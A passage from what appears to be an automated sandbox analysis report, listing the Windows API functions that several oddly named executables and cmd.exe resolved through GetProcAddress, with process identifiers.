00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005888)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00004204)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00004204)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00003640)\n \"bytudy.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003640)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter TlsSetValue (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter TlsGetValue (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter lstrcpyW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WaitForMultipleObjectsEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VirtualQueryEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VirtualQuery (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter TryEnterCriticalSection (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SystemTimeToTzSpecificLocalTime (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SwitchToThread (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SuspendThread (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SizeofResource (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SignalObjectAndWait (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetThreadPriority (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetThreadLocale (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetLastError (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MulDiv (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LockResource (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSection (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GlobalUnlock (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GlobalLock (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GlobalFree (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GlobalFindAtomW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GlobalDeleteAtom (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GlobalAddAtomW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetVersionExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThreadPriority (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDateFormatW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCurrentThread (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCPInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FreeResource (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InterlockedExchangeAdd (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InterlockedCompareExchange (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnumCalendarInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DeleteCriticalSection (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CompareStringW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00000328)\n 